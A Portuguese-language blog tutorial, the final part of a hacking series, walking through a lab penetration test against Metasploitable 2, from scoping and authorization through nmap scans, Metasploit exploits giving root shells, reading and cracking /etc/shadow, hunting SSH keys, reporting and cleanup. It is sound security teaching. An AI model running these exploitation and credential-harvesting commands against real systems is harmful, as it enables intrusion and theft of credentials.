Menu
Sobre Serviços Trajetória Trabalhe Comigo
Security operations center
Segurança 8 mar, 2026 • 30 min de leitura

A Auditoria Completa: Um Teste de Penetração do Início ao Fim

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Compartilhar:
Lee Foropoulos

Lee Foropoulos

30 min de leitura

O Caminho do Hacker: Série de 5 Partes

Parte 1: IntroduçãoParte 2: Domínio do FlipperParte 3: Fundamentos do KaliParte 4: ExploraçãoParte 5: A Auditoria Completa

Você começou esta série se perguntando o que os hackers realmente fazem. Aprendeu que não é sobre capuzes e texto verde. É resolução metódica de problemas. Você clonou crachás, mapeou redes, capturou handshakes e obteve shells em máquinas vulneráveis.

Agora juntamos tudo. Este artigo o guia por um teste de penetração completo contra um alvo fictício. Cada fase, cada decisão, cada descoberta, documentada exatamente como um profissional faria.

O Cenário

Cliente: Initech Labs (uma pequena empresa de tecnologia fictícia)

Escopo: Teste de penetração de rede interna

Objetivo: Identificar vulnerabilidades e demonstrar o impacto potencial nos negócios

Seu alvo: Sua própria rede de laboratório (Kali + Metasploitable 2 + quaisquer outras VMs que configurou)

Prepare um café. Vai ser divertido.

Fase 1: Pré-Engajamento

Antes de tocar em um teclado, pentesters profissionais lidam com o lado comercial. Pule isso, e você não é um pentester. É apenas alguém cometendo crimes.

A Chamada de Escopo

Em um engajamento real, você teria uma chamada com o cliente para entender:

  • O que está no escopo? Quais redes, faixas de IP, aplicações?
  • O que está fora do escopo? Sistemas de produção? Serviços de terceiros?
  • Janela de teste? Quando pode testar? Apenas horário comercial?
  • Pontos de contato? Para quem liga se algo quebrar?
  • Objetivos? Conformidade ou melhoria real de segurança?

Para Seu Laboratório

Escopo: Apenas sua rede de laboratório isolada. Fora do escopo: Todo o resto. Janela de teste: Quando quiser. Objetivo: Aprender fazendo.

Regras de Engajamento

Engajamentos reais têm regras escritas:

  • Carta de autorização - Documento assinado provando que você tem permissão
  • Procedimentos de escalação - O que fazer se encontrar algo crítico
  • Tratamento de dados - Como lidar com dados sensíveis encontrados
  • Requisitos de limpeza - Remover todas as ferramentas e backdoors ao terminar
  • Prazo do relatório - Quando o relatório final deve ser entregue?

Sempre Obtenha Permissão por Escrito

Mesmo para testes "amigáveis" na rede de um amigo. Um email assinado dizendo "você tem permissão para testar minha rede de DATA a DATA" pode ser a diferença entre uma experiência de aprendizado e uma condenação criminal. Leve isso a sério.

Fase 2: Reconhecimento

Hora de aprender tudo sobre o alvo. Em um engajamento real, incluiria OSINT: buscas no Google, perfis do LinkedIn, sites da empresa, registros DNS. Para nosso laboratório, vamos direto ao reconhecimento ativo.

Passo 1: Descoberta de Rede

baship a | grep inet
sudo nmap -sn 192.168.56.0/24 -oA discovery

Documente tudo:

text# Initech Labs - Descoberta de Rede
# Data: 2026-03-08
# Testador: Seu Nome

192.168.56.1   - Gateway/Router
192.168.56.101 - Desconhecido (a investigar)
192.168.56.102 - Desconhecido (a investigar)

Passo 2: Varredura de Portas

bashsudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

No Metasploitable 2, você verá um tesouro:

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

Que exposição. Atualize as notas:

text192.168.56.101 - Servidor Linux (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # Backdoor conhecido!
  - SSH (22): OpenSSH 4.7p1      # Antigo
  - Telnet (23): Ativo            # Por que isso existe em 2026?
  - HTTP (80): Apache 2.2.8      # Apps web para testar
  - SMB (139/445): Samba 3.X     # Mina de ouro potencial
  - MySQL (3306): 5.0.51a        # Acesso ao banco?
  - PostgreSQL (5432): Ativo     # Outro BD

Passo 3: Identificação de Vulnerabilidades

bashsudo nmap --script vuln -oA vuln_scan 192.168.56.101
msfconsole
msf6 > search vsftpd
msf6 > search samba 3

O backdoor do vsftpd 2.3.4 salta aos olhos imediatamente. É um shell garantido. Mas um bom pentester não para na primeira descoberta.

Sala de servidores com equipamentos de rede piscando
O reconhecimento completo mapeia toda a superfície de ataque antes de disparar um único exploit. Cada porta aberta e versão de serviço se torna um ponto de dados na sua avaliação.

Fase 3: Exploração

Aqui as coisas ficam empolgantes. Temos múltiplos pontos de entrada. Vamos trabalhar sistematicamente.

Vetor de Ataque 1: Backdoor FTP

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root
Shell root obtido via backdoor FTP. Tempo da primeira varredura ao comprometimento total: aproximadamente 10 minutos.

Vetor de Ataque 2: Samba

bashmsf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

whoami
root

Outro shell root por um vetor diferente. Dois caminhos independentes para comprometimento total.

Vetor de Ataque 3: Aplicações Web

bashgobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
nikto -h http://192.168.56.101

phpMyAdmin com credenciais padrão: root com senha em branco. Acesso de administrador ao banco de dados sem senha.

Vetor de Ataque 4: Credenciais SSH Fracas

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Fase 4: Pós-Exploração

Temos acesso. Um teste de penetração real demonstra o impacto nos negócios.

Coleta de Credenciais

bashcat /etc/shadow
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Reconhecimento de Rede (De Dentro)

bashifconfig
route -n
netstat -tulpn
find / -name "id_rsa" 2>/dev/null

Descoberta de Dados Sensíveis

bashfind / -name "*.conf" 2>/dev/null | head -20
find / -name "*password*" 2>/dev/null
mysql -u root -p
mysql> SHOW DATABASES;

Escalação de Privilégios (de msfadmin)

bashssh [email protected]
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
Profissional trabalhando com ferramentas de cibersegurança
A pós-exploração demonstra o impacto real nos negócios. A diferença entre uma varredura de vulnerabilidades e um teste de penetração é provar o que um atacante pode realmente fazer com o acesso.

Fase 5: Documentação e Descobertas

O teste é inútil sem relatório.

Resumo das Descobertas

CRÍTICO: Backdoor no Serviço FTP (CVE-2011-2523)

Sistema Afetado: 192.168.56.101 | Risco: Execução remota de código não autenticada como root | Recomendação: Atualizar vsftpd imediatamente ou desabilitar o serviço FTP.

CRÍTICO: Execução Remota de Código Samba

Sistema Afetado: 192.168.56.101 | Recomendação: Atualizar Samba. Restringir acesso SMB.

ALTO: Acesso Root MySQL Sem Senha

Recomendação: Definir senha root forte. Restringir phpMyAdmin.

ALTO: Credenciais SSH Fracas

Recomendação: Implementar política de senhas fortes. Autenticação SSH baseada em chave.

MÉDIO: Serviço Telnet Habilitado

Recomendação: Desabilitar Telnet. Usar SSH.

BAIXO: Página phpinfo() Exposta

Recomendação: Remover ou restringir acesso.

Resumo Executivo

A equipe de segurança obteve controle administrativo completo do servidor principal em 10 minutos.

10 min
Tempo da primeira varredura ao comprometimento root completo em um servidor com serviços desatualizados.
  • 2 vulnerabilidades críticas permitindo controle remoto imediato
  • 2 problemas de alta severidade expondo bancos de dados e credenciais
  • Múltiplas descobertas médias e baixas indicando falhas sistêmicas

Fase 6: Limpeza e Encerramento

bashmsf6 > sessions -K
rm /tmp/linpeas.sh
rm /tmp/*.txt
userdel testuser
rm /home/*/.ssh/authorized_keys

Checklist Metodológica Completa

Metodologia de Teste de Penetração

  1. Pré-Engajamento - Definir escopo, obter autorização escrita, configurar ambiente
  2. Reconhecimento - Descoberta de rede, varredura de portas, identificação de vulnerabilidades
  3. Exploração - Validar e explorar vulnerabilidades, documentar, capturar evidências
  4. Pós-Exploração - Coleta de credenciais, dados sensíveis, escalação de privilégios
  5. Relatório - Resumo executivo, descobertas com evidências, recomendações
  6. Limpeza - Remover ferramentas, fechar sessões, documentar mudanças
Plano de Ação da Auditoria Completa 0/6

O Que Vem a Seguir: Seu Caminho

Você completou O Caminho do Hacker. Passou de "o que significa hacking?" para conduzir um teste de penetração completo.

Plataformas de Prática

  • Hack The Box - Máquinas realistas. Comece com boxes "Fáceis" aposentados.
  • TryHackMe - Caminhos de aprendizado guiados.
  • VulnHub - VMs vulneráveis gratuitas.
  • PentesterLab - Foco em segurança de aplicações web.

Certificações

  • eJPT - Excelente ponto de partida, exame prático
  • OSCP - Padrão da indústria, brutal mas respeitado
  • PNPT - Moderno, prático, inclui escrita de relatório
  • CEH - Para requisitos corporativos, menos prático

Especializações

  • Segurança de Aplicações Web - OWASP, Burp Suite, SQL injection, XSS
  • Active Directory - A maioria dos ambientes corporativos o utiliza
  • Segurança em Nuvem - Pentesting AWS, Azure, GCP
  • Segurança Móvel - Testes de aplicações Android/iOS
  • Red Teaming - Simulação completa de adversário
  • Engenharia Reversa - Análise de malware, desenvolvimento de exploits

Construa Seu Laboratório Doméstico

  • Adicione Windows Server com Active Directory
  • Configure um domain controller
  • Implante aplicações web vulneráveis (DVWA, bWAPP, WebGoat)
  • Construa uma rede com múltiplos segmentos
  • Adicione HoneyAegis para ver ataques da perspectiva do defensor

O Caminho do Hacker: Completo

Você conseguiu. Todas as cinco partes, de curioso a capaz.

Parte 1: Introdução Parte 2: Domínio do Flipper Parte 3: Fundamentos do Kali Parte 4: Exploração Parte 5: A Auditoria Completa

Série Completa - Sua Jornada

Parte 1: Aprendeu o que hacking realmente é e obteve suas primeiras vitórias com o Flipper Zero

Parte 2: Dominou cada protocolo Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO

Parte 3: Construiu seu laboratório Kali, aprendeu nmap e capturou handshakes WiFi

Parte 4: Dominou Metasploit, exploração, escalação de privilégios e pivoting

Parte 5: Juntou tudo em uma metodologia completa de teste de penetração

Segurança não é um destino. É uma prática. As ferramentas mudarão, as vulnerabilidades evoluirão, mas a metodologia permanece. Questione tudo. Documente tudo. Nunca pare de aprender.

Bem-vindo ao outro lado.

  • Lee
How was this article?

Compartilhar

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Nao perca nenhuma publicacao

Receba notificacoes quando novos artigos forem publicados. Sem necessidade de email.

Voce vera um banner no site quando houver um novo post, alem de uma notificacao do navegador se permitir.

Apenas notificacoes do navegador. Sem spam.